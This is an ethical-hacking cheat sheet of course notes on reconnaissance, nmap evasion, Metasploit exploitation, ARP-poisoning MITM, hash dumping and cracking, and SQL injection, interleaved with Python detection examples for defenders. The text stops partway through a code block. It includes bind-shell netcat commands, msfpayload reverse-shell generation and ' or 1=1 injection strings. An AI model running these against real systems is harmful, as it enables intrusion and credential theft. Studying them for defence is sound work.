Ethical Hacking Cheat Sheet


Notes from INFOSEC’s Ethical Hacking and Ethical Hacking Certification self-study courses, as well as TryHackMe.

Passive Intelligence


Get name servers

dig @ ns

Get mail servers

dig @ mx

Get all records / zone transfer

dig @ axfr

AXFR is used to replicate DNS databases, so it will pull all records. It may not be allowed by the server, however.

Reverse lookups

dnsrecon -n -r

-n specifies the name server, and -r the range.

This relies on the DNS server storing reverse records.

DNS proxy / mitm

This is especially useful when we cannot force an application to use a proxy server of our choosing, such as applications that ignore OS HTTP proxy settings.

sudo dnschef

Without parameters, runs as a proxy, which allows us to intercept requests.

sudo dnschef --interface=<if> --fakeip=

This intercepts requests for and resolves them to

Debug it by running dig against it with the @ option to specify the name server:

dig @


This part of the course doesn’t look very passive to me, but it is taught in the passive intelligence section.

Find community strings

onesixtyone -c /usr/share/doc/onesixtyone/dict.txt

Enumerate entries

snmpwalk -v 2c -c secret

Use the appropriate version (-v) and community string (-c).

Enumerate processes (OID)

snmpwalk -v 2c -c secret

Use other OIDs to enumerate different values of the system.

Enumerate processes (MIB)

snmpwalk -v 2c -c secret hrSWRunName

Network discovery

sudo netdiscover -r

Network Reconnaissance


sudo netdiscover

Passively discovers hosts on the network by listening for ARP and other types of packets.


Remember to use -vv for increased verbosity on all scans.

Ping scan/sweep (no port scan)

nmap -sn

List scan

nmap -sL

Performs reverse DNS lookups, like dnsrecon. Does not send any packets to the target hosts.

Firewall/IDS Evasion

No ping:

nmap -Pn

Use in combination with other scans.

Nmap typically pings the host to check whether it is alive before scanning it. Firewalls such as the Windows Firewall drop ICMP ping requests, however, making the host appear to be offline. -Pn tells nmap to scan the host directly without pinging it first.

See Firewall/IDS Evasion and Spoofing for more Firewall/IDS evasion techniques.


nmap -f
nmap -mtu <size>

Makes scan packets less detectable by an IDS.

Use a bad checksum:

nmap --badsum

A host will drop packets with bad checksums. A firewall may reply to it nevertheless. This can be used to determine if there is a firewall/IDS present.

Connect scan

nmap -sT

Half-open (“stealth”) scan

nmap -sS

UDP scan

nmap -sU


nmap -sN
nmap -sF
nmap -sX

Comma and range syntax

nmap -sT,124
nmap -sT

Use this to target multiple hosts.

Greppable output format

nmap -oG out.txt

Get IP addresses from a ping scan

nmap -sn -oG pingscan.txt
grep "Status: Up" pingscan.txt | cut -f2 -d" "

Read and scan IPs from a text file

nmap -iL pingscan.txt
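The cut pipeline above pulls only the IP column out of the greppable file. The following added example (not part of the original notes) parses the same -oG format in Python and goes a step further: it records each host's status and its open ports, which is what you want when turning a scan into an inventory. The sample output is constructed to mirror the -oG layout; the addresses and hostnames are made up.

```python
"""Parse nmap greppable (-oG) output into a host inventory.

Added example, not from the original cheat sheet. The sample lines below are
constructed to mirror the -oG format (one 'Host:' line per target, tab-separated
fields); the addresses and hostnames are made up.
"""
import re

# Constructed sample of what `nmap -sS -p22,80,443 -oG -` prints.
SAMPLE_OG = """\
# Nmap 7.94 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -sS -p22,80,443 -oG - 192.0.2.0/29
Host: 192.0.2.1 (gw.example.test)\tStatus: Up
Host: 192.0.2.1 (gw.example.test)\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/closed/tcp//https///\tIgnored State: closed (0)
Host: 192.0.2.2 ()\tStatus: Up
Host: 192.0.2.2 ()\tPorts: 22/filtered/tcp//ssh///, 80/open/tcp//http///, 443/open/tcp//https///
Host: 192.0.2.3 ()\tStatus: Down
# Nmap done at Mon Jan  1 00:00:05 2024 -- 8 IP addresses (2 hosts up) scanned in 5.00 seconds
"""

HOST_RE = re.compile(r"^Host: (\S+) \(([^)]*)\)")

def parse_greppable(text):
    """Return {ip: {"hostname": str, "status": str, "open": [(port, proto, service)]}}."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # header/footer lines start with '#'
        fields = line.split("\t")
        m = HOST_RE.match(fields[0])
        if not m:
            continue
        ip, name = m.group(1), m.group(2)
        entry = hosts.setdefault(ip, {"hostname": name, "status": None, "open": []})
        for field in fields[1:]:
            if field.startswith("Status: "):
                entry["status"] = field[len("Status: "):]
            elif field.startswith("Ports: "):
                for port_spec in field[len("Ports: "):].split(", "):
                    parts = port_spec.split("/")
                    # port/state/protocol/owner/service/rpc info/version
                    port, state, proto, service = parts[0], parts[1], parts[2], parts[4]
                    if state == "open":
                        entry["open"].append((int(port), proto, service))
    return hosts

def hosts_up(text):
    """IPs reported as Up: the same information the cut pipeline extracts."""
    return sorted(ip for ip, h in parse_greppable(text).items() if h["status"] == "Up")

if __name__ == "__main__":
    for ip, h in parse_greppable(SAMPLE_OG).items():
        print(ip, h["hostname"] or "-", h["status"], h["open"])
```

Feed it the file written by -oG (or `nmap ... -oG -` on stdin) and the hosts_up() list can be written straight back out as the -iL input for the follow-up port scan.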

Test port 80

nmap -p 80

Connect-scan port 80

nmap -sT -p 80

Scan all TCP ports

nmap -sT -p-

-p- for all ports.

UDP scan port 53

sudo nmap -sU -p53

TCP + UDP scan

sudo nmap -sT -sU

Will simultaneously test target ports using TCP and UDP.

Protocol scan

sudo nmap -sO

Determines which IP protocols (TCP, ICMP, IGMP, etc) are supported by the target.

Service identification / version detection

nmap -sV

Performs service identification through banner grabbing. For HTTP, you can imagine this performing a HEAD request to identify the server and its version.

nmap -sV -p80

Script scan

Run scripts on the default set:

nmap -sC

Run all scripts in a category:

nmap --script malware

Run specific scripts:

nmap --script=snmp-sysdescr --script-args snmpcommunity=secret

Get help for a script:

nmap --script-help ftp-anon.nse

Script location: /usr/share/nmap/scripts

Script database: /usr/share/nmap/scripts/script.db - This includes script categories.

Script categories (full list):

See NSEDoc for a full list of scripts.

TLS cipher scan

nmap --script ssl-enum-ciphers -p 443

Returns cipher suites and compressors used by the server, graded A-F based on strength.

Shellshock test

nmap -p 80 --script http-shellshock --script-args uri=/cgi-bin/

MySQL brute force

nmap -p 3306 --script mysql-brute

Understanding and debugging nmap

Use the --packet-trace option to print a summary of packets sent and received by nmap. Applies to all types of scans, not just -sn in this example.

nmap -sn --packet-trace


Used to craft custom packets. Can be used for all sorts of things.

Scan port 80

sudo hping3 -I interface -S -p 80

Scan a range of ports

sudo hping3 -I interface -S --scan 1-81

Spoof the source IP

sudo hping3 -I interface -S -a -p 80

If port 80 is open on the target, the target will reply to

Scanning on mobile

Install BusyBox to get GNU tool replicas on the phone.

ARP ping

busybox arping

Port scan

busybox pscan


Nmap builds are available for mobile. Install nmap on the device. See command reference above.

Stealthy Network Recon

Nmap options

Nmap timing template

nmap -T <polite | sneaky | paranoid | ...>

Use this for different degrees of stealth / scanning speed.

Nmap scan delay

nmap --scan-delay 2s

Nmap waits at least this amount of time between each probe it sends to the target.

SYN scan

nmap -sS

Sends a SYN and waits for the response. If the response is SYN/ACK, assumes the port is open; if it’s RST, assumes it is closed. In the first case, Nmap will not send the final ACK to complete the handshake.

This is actually the default scan option for nmap (needs root, otherwise falls back to a TCP connect() scan, -sT).

FIN scan

nmap -sF

If the port is closed, the target will respond with RST. If the port is open, the target does not respond and instead ignores our FIN packet.

Windows is an exception to the above: it always responds with a RST, so it will appear that ports are always closed. On the bright side, if we know a given port is open and we see this behaviour with FIN scans, then we know the target is a Windows host.

Will trigger any decent IDS like Snort, so not really useful in practice.

XMAS scan

nmap -sX

Same response behaviour as in the case of FIN scans.

Will trigger any decent IDS.

Null scan

nmap -sN

Same response behaviour as in the case of FIN and XMAS scans.

Will trigger any decent IDS.
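The reason FIN, XMAS and Null scans light up an IDS is that no real TCP stack opens a conversation with those flag combinations, so they can be flagged on sight; a SYN scan needs a rate or half-open heuristic instead. The following added example (not from the original notes, and not Snort's logic) classifies constructed packet records by flag set exactly along those lines, so you can see what a detector is keying on. The addresses and the flag letters (tcpdump style) are constructed.

```python
"""Classify TCP probe packets the way an IDS signature for nmap scans would.

Added example, not from the cheat sheet. The packet records below are
constructed; a real deployment would feed them from a pcap or a flow log.
"""
from collections import defaultdict

# Constructed packet records: (src, dst, dport, flags). Flags use tcpdump letters:
# S=SYN, A=ACK, F=FIN, P=PSH, U=URG, R=RST.
PACKETS = [
    ("198.51.100.7", "192.0.2.10", 22, ""),     # NULL probe
    ("198.51.100.7", "192.0.2.10", 80, ""),
    ("198.51.100.7", "192.0.2.10", 443, "F"),   # FIN probe
    ("198.51.100.7", "192.0.2.10", 25, "FPU"),  # XMAS probe
    ("198.51.100.9", "192.0.2.10", 21, "S"),    # SYN probes never followed by ACK
    ("198.51.100.9", "192.0.2.10", 22, "S"),
    ("198.51.100.9", "192.0.2.10", 23, "S"),
    ("198.51.100.9", "192.0.2.10", 80, "S"),
    ("203.0.113.4", "192.0.2.10", 80, "S"),     # legitimate client: SYN then ACK
    ("203.0.113.4", "192.0.2.10", 80, "A"),
    ("203.0.113.4", "192.0.2.10", 80, "PA"),
]

def probe_type(flags):
    """Map a flag set to the nmap scan that sends it, or None for ordinary traffic."""
    f = set(flags)
    if not f:
        return "NULL"       # nmap -sN: no flags at all
    if f == {"F"}:
        return "FIN"        # nmap -sF
    if f == {"F", "P", "U"}:
        return "XMAS"       # nmap -sX: FIN+PSH+URG all lit
    return None

def detect_scans(packets, syn_threshold=3):
    """Return {src: {kind: sorted ports}} for sources that look like scanners.

    FIN/NULL/XMAS probes are flagged on sight. SYN is flagged only when one
    source sends bare SYNs to >= syn_threshold distinct ports without ever
    following up with an ACK (the half-open / -sS pattern).
    """
    findings = defaultdict(lambda: defaultdict(set))
    syns = defaultdict(set)        # src -> ports it sent a bare SYN to
    acked = defaultdict(set)       # src -> ports where it later sent an ACK
    for src, dst, dport, flags in packets:
        kind = probe_type(flags)
        if kind:
            findings[src][kind].add(dport)
        elif set(flags) == {"S"}:
            syns[src].add(dport)
        elif "A" in flags:
            acked[src].add(dport)
    for src, ports in syns.items():
        half_open = ports - acked[src]
        if len(half_open) >= syn_threshold:
            findings[src]["SYN"] = half_open
    return {src: {k: sorted(v) for k, v in kinds.items()} for src, kinds in findings.items()}

if __name__ == "__main__":
    for src, kinds in detect_scans(PACKETS).items():
        print(src, kinds)
```

The Windows caveat from the FIN scan notes applies to the response side only; the probe itself still looks the same on the wire, which is why the classifier needs nothing but the flag byte.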

Idle scan

sudo nmap -sI zombie target

Scans ports on the target by spoofing packets that appear to come from a third host. The third host is probed for its IPID, which usually increments sequentially. The third host is required to be idle to make the IPID increments predictable.

Decoy scan

sudo nmap -sS -p80 -D1.1.1.1,,,

This will scan the target, but it will also spoof packets that appear to be coming from the given decoy IPs. It will look as if those IPs are also scanning the network.

See the ME and RND options in the manual for more. ME inserts your IP at a specific point in the list (its position is otherwise randomized). RND generates a random, non-reserved IP address.

ICMP timestamp request

sudo nmap -sn -PE -PP --send-ip

By default, Nmap uses ping / icmp requests for host discovery. Many hosts have ping turned off to appear to be unreachable, however, in an attempt to dodge scanners.

Instead, we can get Nmap to send ICMP timestamp requests (13), which a host might not be blocking. -PE enables the feature, -PP specifies an ICMP timestamp request. --send-ip asks Nmap to send packets via raw IP sockets.

Subnet mask request

sudo nmap -sn -PE -PM --send-ip

Similar comments as in the case above in terms of stealth and motivation.

Fragmentation scan

sudo nmap -f -sS

A fragmentation scan (-f) will send tiny fragmented IP packets to the target in an attempt to evade IDSs. This splits up TCP headers over several packets to make it harder for IDSs to detect the scan.

(The example above uses -sS for a SYN scan, but you can combine -f with other types of scans.)

Packet Sniffing


Sniff port 80

sudo tshark -i interface -f "tcp port 80"

Sniff icmp

sudo tshark -i interface -f "icmp"

Finding and Exploiting Vulnerabilities


Check all

sudo lynis -c

Run all tests.

Pentest scan

sudo lynis --pentest

For when you don’t have root privileges.

Quick and quiet

sudo lynis --pentest -q -Q

Quick (-Q) and quiet (-q) scan which does not prompt for user input and reports only warnings.

Log and report

sudo cat /var/log/lynis-report.dat
sudo cat /var/log/lynis.log

Check the report and logs for more details on the results of a scan.


Start database service

msfdb init

Start metasploit framework console

msfconsole -L

Import Nessus report

db_import report.nessus

Search for vulnerability in the report

vulns -S shellshock

Replace shellshock with the vulnerability you are looking for.

Search for exploits for a vulnerability

search osvdb:112004

In this example we use the vulnerability’s OSVDB ID.

Launching an exploit

use exploit/multi/http/apache_mod_cgi_bash_env_exec

show options
# Set exploit-specific parameters.
set TARGETURI /cgi-bin/

show payloads
set PAYLOAD linux/x86/shell/reverse_tcp


Generic Payload Handler

use exploit/multi/handler

Provides the Metasploit payload system to exploits launched outside of the framework. Launches a listener that the exploit can connect to.


Crack FTP

hydra -L users.txt -P passwords.txt -vV ftp

For separate user and password files.

hydra -C accounts.txt -vV ftp

For a file with lines formatted as user:password.
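From the defender's side, a hydra run against FTP or SSH shows up as a burst of failed logins from one source, often against several user names, sometimes followed by a success. The following added example (not part of the original notes) finds that pattern in auth.log-style sshd lines. The log lines, host name and addresses are constructed.

```python
"""Detect password-guessing bursts in auth logs and a success that follows one.

Added example, not from the original notes: the defender's counterpart to the
hydra commands above. Log lines are constructed in Linux auth.log/sshd format;
host names and addresses are made up.
"""
import re
from collections import defaultdict
from datetime import datetime

LOG = """\
Jan  1 10:00:01 bastion sshd[2100]: Failed password for invalid user admin from 198.51.100.5 port 51000 ssh2
Jan  1 10:00:02 bastion sshd[2101]: Failed password for invalid user test from 198.51.100.5 port 51001 ssh2
Jan  1 10:00:02 bastion sshd[2102]: Failed password for root from 198.51.100.5 port 51002 ssh2
Jan  1 10:00:03 bastion sshd[2103]: Failed password for bob from 198.51.100.5 port 51003 ssh2
Jan  1 10:00:04 bastion sshd[2104]: Failed password for bob from 198.51.100.5 port 51004 ssh2
Jan  1 10:00:09 bastion sshd[2105]: Accepted password for bob from 198.51.100.5 port 51010 ssh2
Jan  1 10:15:00 bastion sshd[2200]: Failed password for alice from 203.0.113.9 port 40000 ssh2
Jan  1 10:15:20 bastion sshd[2201]: Accepted password for alice from 203.0.113.9 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+")

def parse(log, year=2024):
    """Yield (timestamp, result, user, src) for lines that are login attempts."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            # syslog timestamps carry no year; the caller supplies it
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["src"]

def detect_bruteforce(log, threshold=5, window_s=60):
    """Return {src: {"failures", "users", "success_after_burst"}} for every
    source with >= threshold failures inside window_s seconds."""
    attempts = defaultdict(list)
    for ts, result, user, src in parse(log):
        attempts[src].append((ts, result, user))
    report = {}
    for src, events in attempts.items():
        fails = [(ts, u) for ts, r, u in events if r == "Failed"]
        # sliding window over the (already chronological) failure timestamps
        burst_end = None
        for i in range(len(fails)):
            j = i + threshold - 1
            if j < len(fails) and (fails[j][0] - fails[i][0]).total_seconds() <= window_s:
                burst_end = fails[j][0]
                break
        if burst_end is None:
            continue
        success = next((u for ts, r, u in events if r == "Accepted" and ts >= burst_end), None)
        report[src] = {"failures": len(fails),
                       "users": sorted({u for _, u in fails}),
                       "success_after_burst": success}
    return report

if __name__ == "__main__":
    for src, info in detect_bruteforce(LOG).items():
        print(src, info)
```

A success_after_burst value is the finding that matters: a guessed password is an incident, a burst on its own is usually just noise that rate limiting (fail2ban-style) should absorb.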



To experiment with sniffing and MITM, you can set up virtual networks on your machine using Mininet.

For ARP poisoning, specifically, see mininet_tcp_hijacking.

Start mininet


Run command on host inside the Mininet prompt

h1 date

h1 is the host; it could be h1, h2, h3, etc. date is the command we are running in this particular example.

Run command on host

mininet/m h1 date

Use the m tool provided by mininet.

ARP Poisoning

Enable forwarding

For a MITM, enable forwarding to avoid breaking the target’s traffic:

sudo echo 1 > /proc/sys/net/ipv4/ip_forward

Note that this form fails from an unprivileged shell: sudo applies only to echo, while the redirection into /proc is performed by the calling shell. Use tee instead, which runs as root and also displays the written value:

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

Poison a specific target

sudo arpspoof -i eth0 -t

This makes believe that we are The latter could be the gateway, for example.

To sniff the traffic between two hosts, we must poison both.

Poison the entire subnet

sudo arpspoof -i eth0

Simply leave the target (-t) option out to poison the entire subnet.

Sniff passwords

dsniff -i eth0

Perform a MITM using ARP poisoning first to sniff passwords from a target.
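Seen from the victim's network, the arpspoof setup above has two tell-tale signs: an IP that was bound to one MAC is suddenly announced by another, and one MAC claims several IPs (the gateway and the victim when both are poisoned). The following added example (not from the original notes) watches a stream of ARP replies for both. The replies, addresses and MACs are constructed.

```python
"""Spot ARP poisoning from a stream of ARP replies.

Added example, not from the original notes. It is the defender's view of the
arpspoof setup above: the attacker answers for the gateway (and the victim), so
the same MAC suddenly claims several IPs and a known IP changes MAC. The ARP
reply records below are constructed.
"""
from collections import defaultdict

# Constructed ARP replies: (seconds, sender IP, sender MAC). All MACs are made up.
ARP_REPLIES = [
    (0.0, "192.0.2.1",  "00:11:22:33:44:01"),   # real gateway
    (0.5, "192.0.2.20", "00:11:22:33:44:20"),   # victim
    (1.0, "192.0.2.30", "00:11:22:33:44:30"),
    (5.0, "192.0.2.1",  "02:42:ac:11:00:99"),   # poisoner claims to be the gateway
    (5.1, "192.0.2.20", "02:42:ac:11:00:99"),   # ...and the victim (full MITM)
    (7.0, "192.0.2.1",  "02:42:ac:11:00:99"),   # arpspoof repeats every couple of seconds
]

def detect_arp_spoofing(replies):
    """Return a list of (seconds, kind, detail) alerts.

    'mac_changed' fires when an IP previously bound to one MAC is announced by
    another. 'mac_claims_many' fires when one MAC has announced itself for more
    than one IP, which is what a poisoning host does.
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for t, ip, mac in replies:
        mac = mac.lower()
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append((t, "mac_changed", f"{ip}: {previous} -> {mac}"))
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            alerts.append((t, "mac_claims_many", f"{mac} claims {sorted(mac_to_ips[mac])}"))
    return alerts

def suspect_macs(replies):
    """MACs that appeared in any alert: the addresses to look for on the switch."""
    suspects = set()
    for _, kind, detail in detect_arp_spoofing(replies):
        if kind == "mac_changed":
            suspects.add(detail.split(" -> ")[1])
        else:
            suspects.add(detail.split(" claims ")[0])
    return sorted(suspects)

if __name__ == "__main__":
    for t, kind, detail in detect_arp_spoofing(ARP_REPLIES):
        print(f"t={t:4.1f}s {kind:16} {detail}")
```

The mac_changed rule on its own produces false positives when a host's NIC is legitimately replaced or a VRRP gateway fails over, so in practice the two signals are correlated, and the gateway IP is pinned to a static ARP entry on hosts that matter.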


Ettercap automates ARP poisoning setups for MITM attacks and is also able to dissect packets for various application-layer protocols.

MITM all hosts on the subnet

ettercap -T -i eth0 -M arp:remote -L /tmp/mitm ///

The -L option makes Ettercap create two files: /tmp/mitm.ecp (the captured packets) and /tmp/mitm.eci (the collected information, such as credentials).

Read eci/ecp

etterlog /tmp/mitm.eci


driftnet -i eth0

Sniffs for images in the traffic.

DNS spoofing

dnsspoof -i eth0 -f hosts_file

dnsspoof forges replies to DNS address / pointer queries. Set up a MITM first with ARP poisoning.



Sits as a proxy between a web client and a web server.

Social Engineering Toolkit (SET)

Among many other things, SET can set up website clones that deliver exploits to the visitor. These can be browser-specific, or it can be autopwn, which detects the browser and attempts the relevant exploits. The payload can be meterpreter. SET can also be used for credential stealing and other attacks.


packetrecorder (meterpreter)

List interfaces

run packetrecorder -li


run packetrecorder -i 1

Select the appropriate interface.

Cracking Wi-Fi

Use aircrack-ng to capture traffic first.

Inspect captured traffic

tshark -r capture.pcap

Crack a WEP key

aircrack-ng capture.pcap

Crack WPA2 key

aircrack-ng -w /usr/share/wordlists/rockyou.txt capture.pcap

This crack relies on a word list. The rockyou.txt word list is directly available on Kali Linux.

Cracking Passwords

Windows Lanman passwords

Windows stores LM hashes alongside NTLM hashes unless configured otherwise through a registry key. This is for backwards compatibility to authenticate with older systems.

Dump hashes with pwdump2

pwdump2 > hashes.txt

Use pwdump2 to dump password hashes. This injects a DLL into lsass.exe to read the SAM file.

Dump hashes with meterpreter

run hashdump

Crack with John the Ripper

john hashes.txt

If you know the format:

john hashes.txt --format=nt2

Cracking MD5 hashes using a wordlist:

john hashes.txt --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt

Crack with Cain & Abel

On Windows, you can also crack the passwords with Cain & Abel. john also exists for Windows.
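Before any cracking, a dump in pwdump format already tells a defender which accounts are exposed: an LM field that is not the empty-password LM hash means LM storage is still on for that account (and its password is at most 14 characters), and an NT field equal to the empty-password NT hash means the account has no password at all. The following added example (not part of the original notes) audits a dump for both. The dump lines are constructed; only the two empty-password hash constants are real, well-known values.

```python
"""Flag accounts in a pwdump-style dump that still have an LM hash stored.

Added example, not from the original notes. The dump lines are constructed
(the hash values are made up except the well-known LM and NT hashes of an
empty password, which pwdump-style tools print when no LM hash is stored).
"""

# What tools print in the LM field when LM storage is disabled or the password
# is longer than 14 characters (LM hash of the empty string).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty password: an account with this value has no password set.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacyuser:1001:00112233445566778899aabbccddeeff:fedcba9876543210fedcba9876543210:::
svc_backup:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404ee0123456789abcdef:::
"""

def parse_pwdump(text):
    """Yield (user, rid, lm, nt) from user:rid:lmhash:nthash::: lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError("malformed pwdump line: " + line)
        yield parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()

def audit(text):
    """Return {user: [findings]} for accounts a defender should look at."""
    report = {}
    for user, rid, lm, nt in parse_pwdump(text):
        findings = []
        if lm != EMPTY_LM:
            # LM: DES over two 7-char upper-cased halves, no salt; trivially crackable.
            findings.append("LM hash stored (password <= 14 chars, LM not disabled)")
        if nt == EMPTY_NT:
            findings.append("empty password")
        if findings:
            report[user] = findings
    return report

if __name__ == "__main__":
    for user, findings in audit(SAMPLE_DUMP).items():
        print(f"{user}: {'; '.join(findings)}")
```

The fix for the first finding is the NoLMHash policy (the registry setting the notes refer to) followed by a password change, since the LM hash is only dropped when the password is next set.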

Linux passwords

Unshadow passwords

unshadow passwd shadow > passwords.txt

Get the /etc/passwd and /etc/shadow files from the target, then unshadow them. unshadow is part of the John the Ripper package. It combines both the shadow and passwd files so that John can use them.

Crack passwords

john passwords.txt

passwords.txt is the file resulting from the unshadow step above.

Crack passwords using a wordlist

john passwords.txt -w=wordlist.txt

View passwords

john --show passwords.txt

passwords.txt is the same file that was given to John to crack.

Covert Channels and IDS Evasion


Run in IDS mode

snort -A console -i eth0 -c /etc/snort/snort.conf -l /var/log/snort -K pcap

-A is for alerts, which are displayed on the console.

Packet capture - text mode

snort -dev -i eth0 > capture.txt

Custom rules file


Alert on ICMP requests to any host on the network

alert icmp any any -> $HOME_NET any (msg:"ICMP test"; sid:1000001;)

Alert on FTP connections

alert tcp any any -> $HOME_NET 21 (msg:"FTP connection attempt"; sid:1000002;)

Note that this rule does not actually care whether the connection succeeds / an FTP server is actually running. It simply reacts to the traffic.

Alert on message content

alert tcp any any -> $HOME_NET any (msg:"System file access"; content:"cat /etc/passwd"; sid:1000003;)

This will alert whenever the string cat /etc/passwd is found in a request.
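To see exactly what the three rules above react to, the following added example (not part of the original notes, and not Snort's own parser) implements a minimal evaluator for rules of this shape (alert, one protocol, source/destination with a $HOME_NET variable, msg, content and sid) and runs the page's rules over constructed packets. It handles only that subset; the HOME_NET value, addresses and payloads are constructed.

```python
"""Minimal evaluator for Snort rules of the shape used in the cheat sheet.

Added example, not part of the original notes and not Snort's own parser: it
handles only 'alert <proto> <src> <sport> -> <dst> <dport> (options)' with
msg, content and sid options, and a single $HOME_NET variable. Packets and
the HOME_NET value below are constructed.
"""
import ipaddress
import re

RULES = [
    'alert icmp any any -> $HOME_NET any (msg:"ICMP test"; sid:1000001;)',
    'alert tcp any any -> $HOME_NET 21 (msg:"FTP connection attempt"; sid:1000002;)',
    'alert tcp any any -> $HOME_NET any (msg:"System file access"; content:"cat /etc/passwd"; sid:1000003;)',
]
VARIABLES = {"$HOME_NET": ["192.0.2.0/24"]}   # constructed; snort.conf normally sets this

HEADER_RE = re.compile(r"^(\w+)\s+(\w+)\s+(\S+)\s+(\S+)\s+->\s+(\S+)\s+(\S+)\s*\((.*)\)\s*$")
OPTION_RE = re.compile(r'(\w+):\s*("(?:[^"\\]|\\.)*"|[^;]*);')

def parse_rule(text):
    m = HEADER_RE.match(text)
    if not m:
        raise ValueError("unsupported rule syntax: " + text)
    action, proto, src, sport, dst, dport, opts = m.groups()
    options = {}
    for key, value in OPTION_RE.findall(opts):
        options[key] = value[1:-1] if value.startswith('"') else value
    return {"action": action, "proto": proto, "src": src, "sport": sport,
            "dst": dst, "dport": dport, "options": options}

def addr_matches(spec, ip):
    if spec == "any":
        return True
    nets = VARIABLES.get(spec, [spec])  # a variable expands to its network list
    return any(ipaddress.ip_address(ip) in ipaddress.ip_network(n) for n in nets)

def port_matches(spec, port):
    return spec == "any" or int(spec) == port

def rule_matches(rule, pkt):
    if rule["proto"] != pkt["proto"]:
        return False
    if not (addr_matches(rule["src"], pkt["src"]) and addr_matches(rule["dst"], pkt["dst"])):
        return False
    if not (port_matches(rule["sport"], pkt["sport"]) and port_matches(rule["dport"], pkt["dport"])):
        return False
    content = rule["options"].get("content")
    return content is None or content.encode() in pkt["payload"]   # raw byte match

def evaluate(rules_text, packets):
    """Return [(sid, msg)] for every rule each packet triggers, in packet order."""
    rules = [parse_rule(r) for r in rules_text]
    alerts = []
    for pkt in packets:
        for rule in rules:
            if rule_matches(rule, pkt):
                alerts.append((int(rule["options"]["sid"]), rule["options"]["msg"]))
    return alerts

# Constructed traffic; ICMP has no ports, so those fields are 0.
PACKETS = [
    {"proto": "icmp", "src": "198.51.100.5", "sport": 0, "dst": "192.0.2.8", "dport": 0, "payload": b""},
    {"proto": "tcp", "src": "198.51.100.5", "sport": 51000, "dst": "192.0.2.8", "dport": 21, "payload": b""},
    {"proto": "tcp", "src": "198.51.100.5", "sport": 51001, "dst": "192.0.2.8", "dport": 8080,
     "payload": b"GET /run?cmd=cat%20/etc/passwd HTTP/1.1"},   # URL-encoded: raw content does not match
    {"proto": "tcp", "src": "198.51.100.5", "sport": 51002, "dst": "192.0.2.8", "dport": 22,
     "payload": b"cat /etc/passwd\n"},
    {"proto": "tcp", "src": "192.0.2.8", "sport": 21, "dst": "198.51.100.5", "dport": 51000, "payload": b"220 ready"},
]

if __name__ == "__main__":
    for sid, msg in evaluate(RULES, PACKETS):
        print(sid, msg)
```

Two things the run makes visible: the FTP rule fires on the bare connection to port 21 even though the payload is empty (the point made above), and the content rule misses the URL-encoded request because plain content matches raw bytes; in real Snort that is what the http_uri modifier and the HTTP preprocessor's normalisation are for.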

Encrypted ncat

ncat --ssl -l -p 999 -e /bin/sh

Listens on 999 and drops a shell upon receiving a client connection. The channel is encrypted with SSL.


This transmits messages by hiding them in TCP/IP headers, transferring one byte at a time.

Start the listener

sudo covert_tcp -dest localhost -source localhost -source_port 10000 -dest_port 20000 -server -file /tmp/receive/file.txt

Send the message

sudo covert_tcp -dest localhost -source localhost -source_port 20000 -dest_port 10000 -file /tmp/send/file.txt

Using Trojans and Backdoors


nc -L -p 2000 -k -e cmd.exe

Gets netcat to listen (-L) on port 2000 (-p 2000) and bind a shell (-e cmd.exe) upon receiving a connection. -k makes netcat continue listening even after the client disconnects.

Buffer Overflow Exploits


See Spike. Tutorial here.

Generate payloads with metasploit

Port bind in Perl

msfpayload windows/shell/bind_tcp LPORT=4444 P

This generates port bind shellcode in Perl (P) format that listens on port 4444.

Reverse shell executable

msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=5555 X > payload.exe

Exploiting Common Web Application Vulnerabilities

SQL Injection

' or 1=1#
' or 1=1;--
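What these payloads do, and why bound parameters stop them, is easiest to see by running one against a concatenated query and a parameterised query side by side. The following added example (not from the original notes) does that with an in-memory SQLite table of constructed users. It uses the -- comment form without the semicolon, because SQLite does not treat # as a comment and the sqlite3 module executes one statement at a time.

```python
"""The cheat sheet's ' or 1=1 payload against a concatenated query, beside the
parameterised query that defeats it.

Added example, not from the original notes; uses an in-memory SQLite database
with a constructed users table. The page shows ' or 1=1# and ' or 1=1;-- ;
SQLite does not treat # as a comment and sqlite3 executes one statement at a
time, so the payload below uses the -- comment form without the semicolon.
"""
import sqlite3

PAYLOAD = "' or 1=1--"

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])  # constructed rows
    return conn

def login_vulnerable(conn, username, password):
    """String concatenation: the attacker's quote closes the literal, 'or 1=1'
    makes the WHERE clause true for every row, and -- comments out the
    password check. Returns every user name that matched."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return [row[0] for row in conn.execute(sql)]

def login_parameterised(conn, username, password):
    """Bound parameters: the same input is compared as one literal string,
    so it matches no user name."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]

if __name__ == "__main__":
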